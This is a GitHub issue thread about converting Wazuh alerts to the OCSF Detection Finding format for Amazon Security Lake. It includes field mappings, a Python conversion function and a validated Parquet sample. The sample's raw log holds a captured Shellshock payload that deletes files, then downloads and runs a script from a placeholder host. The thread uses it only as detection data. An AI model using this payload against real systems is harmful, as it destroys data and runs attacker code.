wazuh / wazuh-indexer

Wazuh indexer, the Wazuh search engine
https://opensearch.org/docs/latest/opensearch/index/
Apache License 2.0
6 stars 16 forks source link

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Closed AlexRuiz7 closed 2 months ago

AlexRuiz7 commented 5 months ago

Description

Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from wazuh-indexer indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, we need to somehow transform the data during the pipeline, to later on upload it to the Amazon Security Lake S3 bucket already in OCSF and Parquet.

To transform the data, we'll explore the use of a Lambda function and a Python script. The main difference about these 2 approaches is the resources required, as the first one needs an auxiliary S3 bucket.

Tasks

Subtasks

Definition of done

These two proposals will be worked in parallel. As soon as we manage to get one of these workings, we can consider this issue completed. Once that happens, we'll discuss the next steps.

kclinden commented 5 months ago

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered? https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

AlexRuiz7 commented 4 months ago

Together with @wazuh/threat-intel team, we have worked on generating mappings to transform our data to the OCSF schema. In order to do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but was discarded due to its deprecation on the latest version of OCSF.

OCSF Version: 1.1.0

OCSF Value
category_uid 2
category_name Findings
class_uid 2004
class_name Detection Finding
type_uid 200401
metadata.product.name Wazuh
metadata.product.vendor_name Wazuh, Inc,.
metadata.product.version 4.9.0
metadata.product.lang en
metadata.log_name Security events
metadata.log_provider Wazuh
OCSF (2004) Wazuh event field
activity_id 1
time timestamp
message rule.description
count rule.firedtimes
finding_info.uid id
finding_info.title rule.description
finding_info.types input.type
finding_info.analytic.category rule.groups
finding_info.analytic.name decoder.name
finding_info.analytic.type Rule
finding_info.analytic.type_id 1
finding_info.analytic.uid rule.id
risk_score rule.level
finding_info.attacks.tactic.name rule.mitre.tactic
finding_info.attacks.technique.name rule.mitre.technique
finding_info.attacks.technique.uid rule.mitre.technique
finding_info.attacks.version v13.1
unmapped rule.nist_800_53
severity_id convert(rule.level)
status_id 99
resources.name agent.name
resources.uid agent.id
unmapped ['_index', 'location', 'manager.name']
raw_data full_log

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673

To test these mappings work and lead our data to be OCSF compliant, we have used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.
Python mappings to OCSF

```python #!/usr/bin/python # event comes from Filebeat event = {} def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. """ # TODO normalization return level def join(iterable, separator=","): return (separator.join(iterable)) def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ { "activity_id": 1, "category_name": "Findings", "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, "count": event["_source"]["rule"]["firedtimes"], "message": event["_source"]["rule"]["description"], "finding_info": { "analytic": { "category": join(event["_source"]["rule"]["groups"]), "name": event["_source"]["decoder"]["name"], "type_id": 1, "uid": event["_source"]["rule"]["id"], }, "attacks": { "tactic": { "name": join(event["_source"]["rule"]["mitre"]["tactic"]), }, "technique": { "name": join(event["_source"]["rule"]["mitre"]["technique"]), "uid": join(event["_source"]["rule"]["mitre"]["id"]), }, "version": "v13.1" }, "title": event["_source"]["rule"]["description"], "types": [ event["_source"]["input"]["type"] ], "uid": event["_source"]['id'] }, "metadata": { "log_name": "Security events", "log_provider": "Wazuh", "product": { "name": "Wazuh", "lang": "en", "vendor_name": "Wazuh, Inc,." }, "version": "1.1.0", }, "raw_data": event["_source"]["full_log"], "resources": [ { "name": event["_source"]["agent"]["name"], "uid": event["_source"]["agent"]["id"] }, ], "risk_score": event["_source"]["rule"]["level"], "severity_id": normalize(event["_source"]["rule"]["level"]), "status_id": 99, "time": event["_source"]["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], event["_source"]["location"], event["_source"]["manager"]["name"] ], "nist": event["_source"]["rule"]["nist_800_53"], # Array } } return ocsf_class_template ```

AlexRuiz7 commented 4 months ago

I'm working on an event generator tool to test the integration and ease its development.